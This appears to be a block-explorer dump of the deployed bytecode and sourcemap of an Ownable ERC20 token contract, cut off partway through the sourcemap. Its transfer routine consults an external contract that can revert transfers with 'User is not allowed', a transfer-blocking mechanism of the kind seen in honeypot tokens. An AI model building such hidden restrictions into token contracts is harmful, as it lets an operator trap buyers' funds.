0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d71461029f578063a9059cbb146102cf578063dd62ed3e146102ff578063f2fde38b1461032f57610100565b8063715018a61461023d578063837197b2146102475780638da5cb5b1461026357806395d89b411461028157610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806339509351146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806315ee3f501461015357806318160ddd14610171575b600080fd5b61010d61034b565b60405161011a9190610f5a565b60405180910390f35b61013d60048036038101906101389190611015565b6103dd565b60405161014a9190611070565b60405180910390f35b61015b610400565b60405161016891906110ea565b60405180910390f35b610179610426565b6040516101869190611114565b60405180910390f35b6101a960048036038101906101a4919061112f565b610430565b6040516101b69190611070565b60405180910390f35b6101c761045f565b6040516101d4919061119e565b60405180910390f35b6101f760048036038101906101f29190611015565b610468565b6040516102049190611070565b60405180910390f35b610227600480360381019061022291906111b9565b61049f565b6040516102349190611114565b60405180910390f35b6102456104e7565b005b610261600480360381019061025c91906111b9565b6104fb565b005b61026b61056d565b60405161027891906111f5565b60405180910390f35b610289610597565b6040516102969190610f5a565b60405180910390f35b6102b960048036038101906102b49190611015565b610629565b6040516102c69190611070565b60405180910390f35b6102e960048036038101906102e49190611015565b6106a0565b6040516102f69190611070565b60405180910390f35b61031960048036038101906103149190611210565b6106c3565b6040516103269190611114565b60405180910390f35b610349600480360381019061034491906111b9565b61074a565b005b60606004805461035a9061127f565b80601f01602080910402602001604051908101604052809291908181526020018280546103869061127f565b80156103d35780601f106103a8576101008083540402835291602001916103d3565b820191906000526020600020905b8154815290600101906020018083116103b657829003601f168201915b5050505050905090565b6000806103e86107cd565b90506103f58185856107d5565b600191505092915050565b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600354905090565b60008061043b6107cd565b905061044885828561099e565b610453858585610a2a565b60019150509392505050565b60006012905090565b6000806104736107cd565b905061049481858561048585896106c3565b61048f91906112df565b6107d5565b600191505092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104ef610d7c565b6104f96000610dfa565b565b610503610d7c565b600061050e3361049f565b90506bdef376571332906a88000000811461055e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105559061135f565b60405180910390fd5b610569338383610a2a565b5050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546105a69061127f565b80601f01602080910402602001604051908101604052809291908181526020018280546105d29061127f565b801561061f5780601f106105f45761010080835404028352916020019161061f565b820191906000526020600020905b81548152906001019060200180831161060257829003601f168201915b5050505050905090565b6000806106346107cd565b9050600061064282866106c3565b905083811015610687576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161067e906113f1565b60405180910390fd5b61069482868684036107d5565b60019250505092915050565b6000806106ab6107cd565b90506106b8818585610a2a565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610752610d7c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107b890611483565b60405180910390fd5b6107ca81610dfa565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610844576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083b90611515565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108aa906115a7565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109919190611114565b60405180910390a3505050565b60006109aa84846106c3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a245781811015610a16576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0d90611613565b60405180910390fd5b610a2384848484036107d5565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a90906116a5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aff90611737565b60405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f5f9a371846040518263ffffffff1660e01b8152600401610b6391906111f5565b602060405180830381865afa158015610b80573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ba49190611783565b15610be4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bdb906117fc565b60405180910390fd5b610bef838383610ec0565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610c75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6c9061188e565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d639190611114565b60405180910390a3610d76848484610ec5565b50505050565b610d846107cd565b73ffffffffffffffffffffffffffffffffffffffff16610da261056d565b73ffffffffffffffffffffffffffffffffffffffff1614610df8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610def906118fa565b60405180910390fd5b565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f04578082015181840152602081019050610ee9565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f2c82610eca565b610f368185610ed5565b9350610f46818560208601610ee6565b610f4f81610f10565b840191505092915050565b60006020820190508181036000830152610f748184610f21565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fac82610f81565b9050919050565b610fbc81610fa1565b8114610fc757600080fd5b50565b600081359050610fd981610fb3565b92915050565b6000819050919050565b610ff281610fdf565b8114610ffd57600080fd5b50565b60008135905061100f81610fe9565b92915050565b6000806040838503121561102c5761102b610f7c565b5b600061103a85828601610fca565b925050602061104b85828601611000565b9150509250929050565b60008115159050919050565b61106a81611055565b82525050565b60006020820190506110856000830184611061565b92915050565b6000819050919050565b60006110b06110ab6110a684610f81565b61108b565b610f81565b9050919050565b60006110c282611095565b9050919050565b60006110d4826110b7565b9050919050565b6110e4816110c9565b82525050565b60006020820190506110ff60008301846110db565b92915050565b61110e81610fdf565b82525050565b60006020820190506111296000830184611105565b92915050565b60008060006060848603121561114857611147610f7c565b5b600061115686828701610fca565b935050602061116786828701610fca565b925050604061117886828701611000565b9150509250925092565b600060ff82169050919050565b61119881611182565b82525050565b60006020820190506111b3600083018461118f565b92915050565b6000602082840312156111cf576111ce610f7c565b5b60006111dd84828501610fca565b91505092915050565b6111ef81610fa1565b82525050565b600060208201905061120a60008301846111e6565b92915050565b6000806040838503121561122757611226610f7c565b5b600061123585828601610fca565b925050602061124685828601610fca565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061129757607f821691505b6020821081036112aa576112a9611250565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006112ea82610fdf565b91506112f583610fdf565b925082820190508082111561130d5761130c6112b0565b5b92915050565b7f546f6b656e7320616c7265616479206469737472696275746564000000000000600082015250565b6000611349601a83610ed5565b915061135482611313565b602082019050919050565b600060208201905081810360008301526113788161133c565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006113db602583610ed5565b91506113e68261137f565b604082019050919050565b6000602082019050818103600083015261140a816113ce565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061146d602683610ed5565b915061147882611411565b604082019050919050565b6000602082019050818103600083015261149c81611460565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006114ff602483610ed5565b915061150a826114a3565b604082019050919050565b6000602082019050818103600083015261152e816114f2565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611591602283610ed5565b915061159c82611535565b604082019050919050565b600060208201905081810360008301526115c081611584565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006115fd601d83610ed5565b9150611608826115c7565b602082019050919050565b6000602082019050818103600083015261162c816115f0565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061168f602583610ed5565b915061169a82611633565b604082019050919050565b600060208201905081810360008301526116be81611682565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611721602383610ed5565b915061172c826116c5565b604082019050919050565b6000602082019050818103600083015261175081611714565b9050919050565b61176081611055565b811461176b57600080fd5b50565b60008151905061177d81611757565b92915050565b60006020828403121561179957611798610f7c565b5b60006117a78482850161176e565b91505092915050565b7f55736572206973206e6f7420616c6c6f77656400000000000000000000000000600082015250565b60006117e6601383610ed5565b91506117f1826117b0565b602082019050919050565b60006020820190508181036000830152611815816117d9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611878602683610ed5565b91506118838261181c565b604082019050919050565b600060208201905081810360008301526118a78161186b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006118e4602083610ed5565b91506118ef826118ae565b602082019050919050565b60006020820190508181036000830152611913816118d7565b905091905056fea2646970667358221220cad94ec0cde2fd7964dbbaeead41bf25e8916a89b256015fc2ad8aa9dc853fa264736f6c63430008120033

Deployed Bytecode Sourcemap

14117:513:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7471:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9193:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6653:39;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7962:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9402:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7804:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9707:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8133:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3092:103;;;:::i;:::-;;14379:248;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2444:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7690:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9956:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8466:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8722:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3350:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7471:100;7525:13;7558:5;7551:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7471:100;:::o;9193:201::-;9276:4;9293:13;9309:12;:10;:12::i;:::-;9293:28;;9332:32;9341:5;9348:7;9357:6;9332:8;:32::i;:::-;9382:4;9375:11;;;9193:201;;;;:::o;6653:39::-;;;;;;;;;;;;;:::o;7962:108::-;8023:7;8050:12;;8043:19;;7962:108;:::o;9402:295::-;9533:4;9550:15;9568:12;:10;:12::i;:::-;9550:30;;9591:38;9607:4;9613:7;9622:6;9591:15;:38::i;:::-;9640:27;9650:4;9656:2;9660:6;9640:9;:27::i;:::-;9685:4;9678:11;;;9402:295;;;;;:::o;7804:93::-;7862:5;7887:2;7880:9;;7804:93;:::o;9707:238::-;9795:4;9812:13;9828:12;:10;:12::i;:::-;9812:28;;9851:64;9860:5;9867:7;9904:10;9876:25;9886:5;9893:7;9876:9;:25::i;:::-;:38;;;;:::i;:::-;9851:8;:64::i;:::-;9933:4;9926:11;;;9707:238;;;;:::o;8133:127::-;8207:7;8234:9;:18;8244:7;8234:18;;;;;;;;;;;;;;;;8227:25;;8133:127;;;:::o;3092:103::-;2330:13;:11;:13::i;:::-;3157:30:::1;3184:1;3157:18;:30::i;:::-;3092:103::o:0;14379:248::-;2330:13;:11;:13::i;:::-;14451:14:::1;14468:21;14478:10;14468:9;:21::i;:::-;14451:38;;14200:20;14508:6;:24;14500:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;14576:43;14586:10;14598:12;14612:6;14576:9;:43::i;:::-;14440:187;14379:248:::0;:::o;2444:87::-;2490:7;2517:6;;;;;;;;;;;2510:13;;2444:87;:::o;7690:104::-;7746:13;7779:7;7772:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7690:104;:::o;9956:436::-;10049:4;10066:13;10082:12;:10;:12::i;:::-;10066:28;;10105:24;10132:25;10142:5;10149:7;10132:9;:25::i;:::-;10105:52;;10196:15;10176:16;:35;;10168:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;10289:60;10298:5;10305:7;10333:15;10314:16;:34;10289:8;:60::i;:::-;10380:4;10373:11;;;;9956:436;;;;:::o;8466:193::-;8545:4;8562:13;8578:12;:10;:12::i;:::-;8562:28;;8601;8611:5;8618:2;8622:6;8601:9;:28::i;:::-;8647:4;8640:11;;;8466:193;;;;:::o;8722:151::-;8811:7;8838:11;:18;8850:5;8838:18;;;;;;;;;;;;;;;:27;8857:7;8838:27;;;;;;;;;;;;;;;;8831:34;;8722:151;;;;:::o;3350:201::-;2330:13;:11;:13::i;:::-;3459:1:::1;3439:22;;:8;:22;;::::0;3431:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3515:28;3534:8;3515:18;:28::i;:::-;3350:201:::0;:::o;844:98::-;897:7;924:10;917:17;;844:98;:::o;12623:380::-;12776:1;12759:19;;:5;:19;;;12751:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12857:1;12838:21;;:7;:21;;;12830:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12941:6;12911:11;:18;12923:5;12911:18;;;;;;;;;;;;;;;:27;12930:7;12911:27;;;;;;;;;;;;;;;:36;;;;12979:7;12963:32;;12972:5;12963:32;;;12988:6;12963:32;;;;;;:::i;:::-;;;;;;;;12623:380;;;:::o;13294:453::-;13429:24;13456:25;13466:5;13473:7;13456:9;:25::i;:::-;13429:52;;13516:17;13496:16;:37;13492:248;;13578:6;13558:16;:26;;13550:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;13662:51;13671:5;13678:7;13706:6;13687:16;:25;13662:8;:51::i;:::-;13492:248;13418:329;13294:453;;;:::o;10862:912::-;11009:1;10993:18;;:4;:18;;;10985:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11086:1;11072:16;;:2;:16;;;11064:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;11148:15;;;;;;;;;;;:24;;;11173:4;11148:30;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;11147:31;11139:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;11213:38;11234:4;11240:2;11244:6;11213:20;:38::i;:::-;11264:19;11286:9;:15;11296:4;11286:15;;;;;;;;;;;;;;;;11264:37;;11335:6;11320:11;:21;;11312:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;11452:6;11438:11;:20;11420:9;:15;11430:4;11420:15;;;;;;;;;;;;;;;:38;;;;11655:6;11638:9;:13;11648:2;11638:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;11705:2;11690:26;;11699:4;11690:26;;;11709:6;11690:26;;;;;;:::i;:::-;;;;;;;;11729:37;11749:4;11755:2;11759:6;11729:19;:37::i;:::-;10974:800;10862:912;;;:::o;2609:132::-;2684:12;:10;:12::i;:::-;2673:23;;:7;:5;:7::i;:::-;:23;;;2665:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2609:132::o;3711:191::-;3785:16;3804:6;;;;;;;;;;;3785:25;;3830:8;3821:6;;:17;;;;;;;;;;;;;;;;;;3885:8;3854:40;;3875:8;3854:40;;;;;;;;;;;;3774:128;3711:191;:::o;13757:125::-;;;;:::o;13892:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:60::-;3474:3;3495:5;3488:12;;3446:60;;;:::o;3512:142::-;3562:9;3595:53;3613:34;3622:24;3640:5;3622:24;:::i;:::-;3613:34;:::i;:::-;3595:53;:::i;:::-;3582:66;;3512:142;;;:::o;3660:126::-;3710:9;3743:37;3774:5;3743:37;:::i;:::-;3730:50;;3660:126;;;:::o;3792:149::-;3865:9;3898:37;3929:5;3898:37;:::i;:::-;3885:50;;3792:149;;;:::o;3947:177::-;4057:60;4111:5;4057:60;:::i;:::-;4052:3;4045:73;3947:177;;:::o;4130:268::-;4246:4;4284:2;4273:9;4269:18;4261:26;;4297:94;4388:1;4377:9;4373:17;4364:6;4297:94;:::i;:::-;4130:268;;;;:::o;4404:118::-;4491:24;4509:5;4491:24;:::i;:::-;4486:3;4479:37;4404:118;;:::o;4528:222::-;4621:4;4659:2;4648:9;4644:18;4636:26;;4672:71;4740:1;4729:9;4725:17;4716:6;4672:71;:::i;:::-;4528:222;;;;:::o;4756:619::-;4833:6;4841;4849;4898:2;4886:9;4877:7;4873:23;4869:32;4866:119;;;4904:79;;:::i;:::-;4866:119;5024:1;5049:53;5094:7;5085:6;5074:9;5070:22;5049:53;:::i;:::-;5039:63;;4995:117;5151:2;5177:53;5222:7;5213:6;5202:9;5198:22;5177:53;:::i;:::-;5167:63;;5122:118;5279:2;5305:53;5350:7;5341:6;5330:9;5326:22;5305:53;:::i;:::-;5295:63;;5250:118;4756:619;;;;;:::o;5381:86::-;5416:7;5456:4;5449:5;5445:16;5434:27;;5381:86;;;:::o;5473:112::-;5556:22;5572:5;5556:22;:::i;:::-;5551:3;5544:35;5473:112;;:::o;5591:214::-;5680:4;5718:2;5707:9;5703:18;5695:26;;5731:67;5795:1;5784:9;5780:17;5771:6;5731:67;:::i;:::-;5591:214;;;;:::o;5811:329::-;5870:6;5919:2;5907:9;5898:7;5894:23;5890:32;5887:119;;;5925:79;;:::i;:::-;5887:119;6045:1;6070:53;6115:7;6106:6;6095:9;6091:22;6070:53;:::i;:::-;6060:63;;6016:117;5811:329;;;;:::o;6146:118::-;6233:24;6251:5;6233:24;:::i;:::-;6228:3;6221:37;6146:118;;:::o;6270:222::-;6363:4;6401:2;6390:9;6386:18;6378:26;;6414:71;6482:1;6471:9;6467:17;6458:6;6414:71;:::i;:::-;6270:222;;;;:::o;6498:474::-;6566:6;6574;6623:2;6611:9;6602:7;6598:23;6594:32;6591:119;;;6629:79;;:::i;:::-;6591:119;6749:1;6774:53;6819:7;6810:6;6799:9;6795:22;6774:53;:::i;:::-;6764:63;;6720:117;6876:2;6902:53;6947:7;6938:6;6927:9;6923:22;6902:53;:::i;:::-;6892:63;;6847:118;6498:474;;;;;:::o;6978:180::-;7026:77;7023:1;7016:88;7123:4;7120:1;7113:15;7147:4;7144:1;7137:15;7164:320;7208:6;7245:1;7239:4;7235:12;7225:22;;7292:1;7286:4;7282:12;7313:18;7303:81;;7369:4;7361:6;7357:17;7347:27;;7303:81;7431:2;7423:6;7420:14;7400:18;7397:38;7394:84;;7450:18;;:::i;:::-;7394:84;7215:269;7164:320;;;:::o;7490:180::-;7538:77;7535:1;7528:88;7635:4;7632:1;7625:15;7659:4;7656:1;7649:15;7676:191;7716:3;7735:20;7753:1;7735:20;:::i;:::-;7730:25;;7769:20;7787:1;7769:20;:::i;:::-;7764:25;;7812:1;7809;7805:9;7798:16;;7833:3;7830:1;7827:10;7824:36;;;7840:18;;:::i;:::-;7824:36;7676:191;;;;:::o;7873:176::-;8013:28;8009:1;8001:6;7997:14;7990:52;7873:176;:::o;8055:366::-;8197:3;8218:67;8282:2;8277:3;8218:67;:::i;:::-;8211:74;;8294:93;8383:3;8294:93;:::i;:::-;8412:2;8407:3;8403:12;8396:19;;8055:366;;;:::o;8427:419::-;8593:4;8631:2;8620:9;8616:18;8608:26;;8680:9;8674:4;8670:20;8666:1;8655:9;8651:17;8644:47;8708:131;8834:4;8708:131;:::i;:::-;8700:139;;8427:419;;;:::o;8852:224::-;8992:34;8988:1;8980:6;8976:14;8969:58;9061:7;9056:2;9048:6;9044:15;9037:32;8852:224;:::o;9082:366::-;9224:3;9245:67;9309:2;9304:3;9245:67;:::i;:::-;9238:74;;9321:93;9410:3;9321:93;:::i;:::-;9439:2;9434:3;9430:12;9423:19;;9082:366;;;:::o;9454:419::-;9620:4;9658:2;9647:9;9643:18;9635:26;;9707:9;9701:4;9697:20;9693:1;9682:9;9678:17;9671:47;9735:131;9861:4;9735:131;:::i;:::-;9727:139;;9454:419;;;:::o;9879:225::-;10019:34;10015:1;10007:6;10003:14;9996:58;10088:8;10083:2;10075:6;10071:15;10064:33;9879:225;:::o;10110:366::-;10252:3;10273:67;10337:2;10332:3;10273:67;:::i;:::-;10266:74;;10349:93;10438:3;10349:93;:::i;:::-;10467:2;10462:3;10458:12;10451:19;;10110:366;;;:::o;10482:419::-;10648:4;10686:2;10675:9;10671:18;10663:26;;10735:9;10729:4;10725:20;10721:1;10710:9;10706:17;10699:47;10763:131;10889:4;10763:131;:::i;:::-;10755:139;;10482:419;;;:::o;10907:223::-;11047:34;11043:1;11035:6;11031:14;11024:58;11116:6;11111:2;11103:6;11099:15;11092:31;10907:223;:::o;11136:366::-;11278:3;11299:67;11363:2;11358:3;11299:67;:::i;:::-;11292:74;;11375:93;11464:3;11375:93;:::i;:::-;11493:2;11488:3;11484:12;11477:19;;11136:366;;;:::o;11508:419::-;11674:4;11712:2;11701:9;11697:18;11689:26;;11761:9;11755:4;11751:20;11747:1;11736:9;11732:17;11725:47;11789:131;11915:4;11789:131;:::i;:::-;11781:139;;11508:419;;;:::o;11933:221::-;12073:34;12069:1;12061:6;12057:14;12050:58;12142:4;12137:2;12129:6;12125:15;12118:29;11933:221;:::o;12160:366::-;12302:3;12323:67;12387:2;12382:3;12323:67;:::i;:::-;12316:74;;12399:93;12488:3;12399:93;:::i;:::-;12517:2;12512:3;12508:12;12501:19;;12160:366;;;:::o;12532:419::-;12698:4;12736:2;12725:9;12721:18;12713:26;;12785:9;12779:4;12775:20;12771:1;12760:9;12756:17;12749:47;12813:131;12939:4;12813:131;:::i;:::-;12805:139;;12532:419;;;:::o;12957:179::-;13097:31;13093:1;13085:6;13081:14;13074:55;12957:179;:::o;13142:366::-;13284:3;13305:67;13369:2;13364:3;13305:67;:::i;:::-;13298:74;;13381:93;13470:3;13381:93;:::i;:::-;13499:2;13494:3;13490:12;13483:19;;13142:366;;;:::o;13514:419::-;13680:4;13718:2;13707:9;13703:18;13695:26;;13767:9;13761:4;13757:20;13753:1;13742:9;13738:17;13731:47;13795:131;13921:4;13795:131;:::i;:::-;13787:139;;13514:419;;;:::o;13939:224::-;14079:34;14075:1;14067:6;14063:14;14056:58;14148:7;14143:2;14135:6;14131:15;14124:32;13939:224;:::o;14169:366::-;14311:3;14332:67;14396:2;14391:3;14332:67;:::i;:::-;14325:74;;14408:93;14497:3;14408:93;:::i;:::-;14526:2;14521:3;14517:12;14510:19;;14169:366;;;:::o;14541:419::-;14707:4;14745:2;14734:9;14730:18;14722:26;;14794:9;14788:4;14784:20;14780:1;14769:9;14765:17;14758:47;14822:131;14948:4;14822:131;:::i;:::-;14814:139;;14541:419;;;:::o;14966:222::-;15106:34;15102:1;15094:6;15090:14;15083:58;15175:5;15170:2;15162:6;15158:15;15151:30;14966:222;:::o;15194:366::-;15336:3;15357:67;15421:2;15416:3;15357:67;:::i;:::-;15350:74;;15433:93;15522:3;15433:93;:::i;:::-;15551:2;15546:3;15542:12;15535:19;;15194:366;;;:::o;15566:419::-;15732:4;15770:2;15759:9;15755:18;15747:26;;15819:9;15813:4;15809:20;15805:1;15794:9;15790:17;15783:47;15847:131;15973:4;15847:131;:::i;:::-;15839:139;;15566:419;;;:::o;15991:116::-;16061:21;16076:5;16061:21;:::i;:::-;16054:5;16051:32;16041:60;;16097:1;16094;16087:12;16041:60;15991:116;:::o;16113:137::-;16167:5;16198:6;16192:13;16183:22;;16214:30;16238:5;16214:30;:::i;:::-;16113:137;;;;:::o;16256:345::-;16323:6;16372:2;16360:9;16351:7;16347:23;16343:32;16340:119;;;16378:79;;:::i;:::-;16340:119;16498:1;16523:61;16576:7;16567:6;16556:9;16552:22;16523:61;:::i;:::-;16513:71;;16469:125;16256:345;;;;:::o;16607:169::-;16747:21;16743:1;16735:6;16731:14;16724:45;16607:169;:::o;16782:366::-;16924:3;16945:67;17009:2;17004:3;16945:67;:::i;:::-;16938:74;;17021:93;17110:3;17021:93;:::i;:::-;17139:2;17134:3;17130:12;17123:19;;16782:366;;;:::o;17154:419::-;17320:4;17358:2;17347:9;17343:18;17335:26;;17407:9;1